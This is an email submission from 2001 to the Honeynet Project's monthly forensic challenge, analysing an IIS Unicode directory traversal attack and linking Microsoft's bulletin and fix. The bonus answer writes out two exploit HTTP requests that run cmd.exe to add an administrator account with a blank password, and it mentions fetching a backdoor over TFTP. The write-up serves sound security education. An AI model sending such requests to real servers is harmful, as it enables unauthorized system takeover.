From ichinin@swipnet.se Wed Feb 14 19:13:31 2001
Date: Sun, 28 Jan 2001 09:23:42 +0100
From: Ichinin
To: project@honeynet.org
Subject: Scan12 (Scan of the month February submission)
Mailto: project@honeynet.org
Hi.
This is my submission for "Scan12" or Scan Of the month for february.
Regards,
Glenn "Ichinin" Larsson
(Security researcher)
Vasteras
Sweden
[ichinin@SUESPAMMERS.org]
_____________________________________________________________________________
### QUESTION 1: What is the operating system of the honeypot, how do
you know?
-> Most likely Windows NT 4.0, running IIS 4.0
How i know? Well IIRC, Win2K & NT5 (beta) was shipped with
IIS5.0
(But then... it MAY be a vmware emulation of Nt 4.0 :o)
### QUESTION 2: What is the name of this attack?
-> To my best findings:
IIS Extended UNICODE Directory Traversal Vulnerability
( http://www.securityfocus.com/bid/1806 )
### QUESTION 3: What is the attack attempting to accomplish?
-> This particular method is attempting to list files, but
it is possible to retrieve files, move files, delete files
or even start/stop services.
### QUESTION 4: How does the attack work?
-> It utilises unicode to make the IIS parser fail.
BONUS QUESTION: Is it possible to gain remote control of the system
using this technqiue? If so, how?
-> Probably as simple as opening up a telnet session to the remote
HTTP service, and executing the following HTTP requests:
"GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/" +
"system32/cmd.exe?/c+net+user+ROOT+/add"
"GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/" +
"system32/cmd.exe?/c+net+localgroup+administrators+ROOT+/add"
Now you should have an administrative account (ROOT) that has a blank
("") password.
(Both of these HTTP Requests are untested, but should work
according to the security advisory, lines wrapped for readbility.)
Also, as the refered to advisory explain, a TFTP server can be
installed on
another server and the TFTP.EXE command can be used to retrieve a
backdoor
or other services.
Note:
The above exploit is pretty pointless(!) the intruder already can do
whatever they
want with the system, and twiddeling with such things as account (or
policy) changes
can cause alarms (other than the IDS) to fire which would be a stupid
thing to do by
an intruder. I assume that the event was created by an unnamed remote
vulnerability
scanner.
Microsoft have a security bulletin available here:
http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp
A fix is available from:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
(Referred to as "Web Server Folder Traversal")